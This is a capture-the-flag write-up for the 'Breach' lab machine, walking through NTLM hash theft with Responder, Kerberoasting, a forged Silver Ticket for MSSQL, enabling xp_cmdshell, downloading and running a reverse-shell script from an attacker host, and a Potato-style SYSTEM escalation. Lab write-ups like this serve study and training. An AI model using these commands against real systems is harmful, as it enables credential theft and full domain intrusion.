Machine (Medium) - Breach
Writeup Author: bobbuilder
Overview
Category: Machine
Difficulty: Medium
Domain: breach.vl
Machine: Windows
Objective: This machine (breach.vl) exposed a writable SMB share and let a domain user's NTLMv2 authentication be coerced to an attacker-controlled host. That led to credential theft with Responder, Kerberoasting of the MSSQL service account, lateral movement into MSSQL, a Silver Ticket forged for the MSSQLSvc SPN that granted sysadmin access as Administrator, and finally SYSTEM through the SeImpersonatePrivilege held by the MSSQL service account.
Enumeration
SMB Shares (Unauthenticated)
nxc smb <breach_ip> -u 'guest' -p '' --shares
Uploading Files to Writable Share
The ntlm_theft payloads (.lnk, .scf, .url, desktop.ini and similar) each embed a UNC path pointing at the attacker host, so anyone who browses the transfer folder authenticates to Responder:
for file in ~/tools/ntlm_theft/nt/*; do
filename=$(basename "$file")
# remote path is relative to the share root; "\\" inside double quotes becomes one backslash
nxc smb <breach_ip> -u 'guest' -p '' --share share --put-file "$file" "\\transfer\\$filename"
done
Alternative using smbclient:
for file in ~/tools/ntlm_theft/nt/*; do
# put takes the local path first and the remote name second, so this works from any directory
smbclient -N -c "cd transfer; put \"$file\" \"$(basename "$file")\"" "//<breach_ip>/share"
done
Initial Access
Capture NTLMv2 Hash (Responder)
Responder's SMB listener answers the authentication attempt triggered when a user opens one of the planted files:
sudo responder -I tun0
- Captured:
Julia.Wong::BREACH:...
Crack NTLMv2 Hash
NetNTLMv2 is hashcat mode 5600 (13100 is the Kerberos TGS-REP mode used for the Kerberoast below):
hashcat.exe -m 5600 hashes.txt uniq.lst
- Recovered credentials:
julia.wong:<REDACTED>
Post-Exploitation
Kerberoasting
impacket-GetUserSPNs -target-domain breach.vl -usersfile users.txt -dc-ip <dc_ip> breach.vl/guest -no-pass
- Extracted a TGS-REP hash (service ticket encrypted with the account's key) for svc_mssql.
Crack SPN Hash
hashcat.exe -m 13100 hashes.txt uniq.lst
- Found credentials:
svc_mssql:<REDACTED>
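Picking the right hashcat mode is the one place where the two cracking steps above differ (NetNTLMv2 from Responder versus Kerberos TGS-REP from GetUserSPNs). The Python below is added here as an example and is not code from the writeup: it recognises the hashcat-format lines that Responder, GetUserSPNs and GetNPUsers emit, returns the mode and the identity the line belongs to, and groups a mixed capture file by mode so each group can be fed to hashcat separately. The sample lines are constructed, with filler hex standing in for real challenge and response data.

```python
import re

# Hashcat mode numbers for the formats that show up in this kind of engagement.
NETNTLMV2, TGS_RC4, TGS_AES128, TGS_AES256, ASREP_RC4 = 5600, 13100, 19600, 19700, 18200

# Responder: user::DOMAIN:server_challenge(16 hex):NTProofStr(32 hex):blob
_NTLMV2 = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<challenge>[0-9a-f]{16}):"
    r"(?P<ntproof>[0-9a-f]{32}):(?P<blob>[0-9a-f]+)$", re.I)
# impacket GetUserSPNs, RC4 (etype 23): $krb5tgs$23$*user$REALM$spn*$checksum$edata
_TGS_RC4 = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$*]+)\$(?P<realm>[^$*]+)\$(?P<spn>[^*]+)\*\$"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$", re.I)
# impacket GetUserSPNs, AES (etype 17/18): $krb5tgs$18$user$REALM$[*spn*$]checksum$edata
_TGS_AES = re.compile(
    r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$"
    r"(?:\*(?P<spn>[^*]*)\*\$)?(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$", re.I)
# impacket GetNPUsers, RC4: $krb5asrep$23$user@REALM:checksum$edata
_ASREP = re.compile(
    r"^\$krb5asrep\$23\$(?P<user>[^@:]+)@(?P<realm>[^:]+):(?P<checksum>[0-9a-f]{32})\$"
    r"(?P<edata>[0-9a-f]+)$", re.I)


def classify(line: str) -> dict:
    """Return mode, user and domain for one hashcat-format line; raise ValueError if unknown."""
    line = line.strip()
    if m := _NTLMV2.match(line):
        return {"mode": NETNTLMV2, "user": m["user"], "domain": m["domain"],
                "server_challenge": m["challenge"].lower()}
    if m := _TGS_RC4.match(line):
        return {"mode": TGS_RC4, "user": m["user"], "domain": m["realm"], "spn": m["spn"]}
    if m := _TGS_AES.match(line):
        mode = TGS_AES256 if m["etype"] == "18" else TGS_AES128
        return {"mode": mode, "user": m["user"], "domain": m["realm"], "spn": m["spn"]}
    if m := _ASREP.match(line):
        return {"mode": ASREP_RC4, "user": m["user"], "domain": m["realm"]}
    raise ValueError(f"unrecognised hash format: {line[:40]}...")


def group_by_mode(lines) -> dict:
    """Split a mixed capture into {hashcat_mode: [lines]} so each group gets its own hashcat run."""
    groups: dict = {}
    for line in lines:
        if line.strip():
            groups.setdefault(classify(line)["mode"], []).append(line.strip())
    return groups


# Constructed sample lines (placeholder hex, not real captures).
SAMPLE_CAPTURE = [
    "Julia.Wong::BREACH:1122334455667788:" + "aa" * 16 + ":" + "0101000000000000" + "bb" * 24,
    "$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$" + "cc" * 16 + "$" + "dd" * 48,
]

if __name__ == "__main__":
    for mode, entries in group_by_mode(SAMPLE_CAPTURE).items():
        for entry in entries:
            info = classify(entry)
            print(f"hashcat -m {mode}  # {info['domain']}\\{info['user']}")
```

Run it over the real hashes.txt before cracking; a Responder line that ends up in a 13100 run (or the reverse) is silently skipped by hashcat as "Separator unmatched", which is easy to miss in a long session.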
MSSQL Access
impacket-mssqlclient breach/svc_mssql:<REDACTED>@breach.vl -windows-auth
Directory Listing via xp_dirtree
xp_dirtree needs no configuration change and lists directories as the MSSQL service account, a quick check of what that account can reach on disk:
EXEC xp_dirtree 'C:\';
BloodHound Enumeration
bloodhound-python -c all -u "svc_mssql" -p "<REDACTED>" -d breach.vl -ns <dc_ip>
Privilege Escalation - Silver Ticket
Dump PAC Info (Identify Domain SID)
getPac prints the SIDs carried in Administrator's PAC; the domain SID is the account SID with its trailing RID (-500) removed:
impacket-getPac -targetUser administrator breach.vl/julia.wong:<REDACTED>
Derive NTLM Hash from Password
The Silver Ticket has to be encrypted with the service account's Kerberos key, which for RC4 (etype 23) is simply its NT hash: an unsalted MD4 over the UTF-16LE password. printf '%s' keeps a trailing newline out of the input, and -provider legacy is needed because OpenSSL 3 no longer ships MD4 in the default provider:
iconv -f ASCII -t UTF-16LE <(printf '%s' 'Trustno1') | openssl dgst -md4 -provider legacy
- Output:
<svc_mssql_ntlm_hash>
Extract SPN from BloodHound
MSSQLSvc/breachdc.breach.vl
Craft Silver Ticket
impacket-ticketer -nthash <svc_mssql_ntlm_hash> -domain-sid <domain_sid> -domain breach.vl -spn MSSQLSvc/breachdc.breach.vl Administrator
export KRB5CCNAME=./Administrator.ccache
The KDC is never contacted: the forged service ticket only has to decrypt under svc_mssql's RC4 key (its NT hash), and MSSQL accepted it and honoured the Administrator identity in the PAC. Had the account been AES-only, -aesKey would replace -nthash.
Authenticate via Silver Ticket
The target must be the host name from the SPN (resolvable, for example via /etc/hosts) so the client asks for the matching service; -k -no-pass makes mssqlclient use the ticket in KRB5CCNAME:
impacket-mssqlclient breachdc.breach.vl -k -no-pass
Enable command execution:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
EXEC xp_cmdshell 'whoami';
Execute Reverse Shell (PowerShell)
mssqlclient exposes xp_cmdshell as a built-in helper, so the commands can be typed at its prompt; the script is fetched from the attacker's web server, then run with the execution policy bypassed:
xp_cmdshell powershell -c "curl http://<attacker_ip>/tiny_revtcp.ps1 -o C:\Users\Public\Downloads\tcp.ps1"
xp_cmdshell powershell -ExecutionPolicy Bypass -c "cd C:\Users\Public\Downloads;.\tcp.ps1"
Privilege Escalation - SeImpersonatePrivilege
Confirm Token Privileges
whoami /all
- Confirmed SeImpersonatePrivilege is enabled (SQL Server service accounts hold it by default).
Exploit via Potato-family Tool
With SeImpersonatePrivilege the service account can impersonate a SYSTEM token obtained by coercing a local privileged authentication, which is what the Potato tools automate. Use -o for the output name: with -O curl keeps the remote file name and parses god.exe as a second URL:
curl http://<attacker_ip>/god4.exe -o god.exe
.\god.exe -cmd "cmd /c more C:\Users\Administrator\Desktop\root.txt"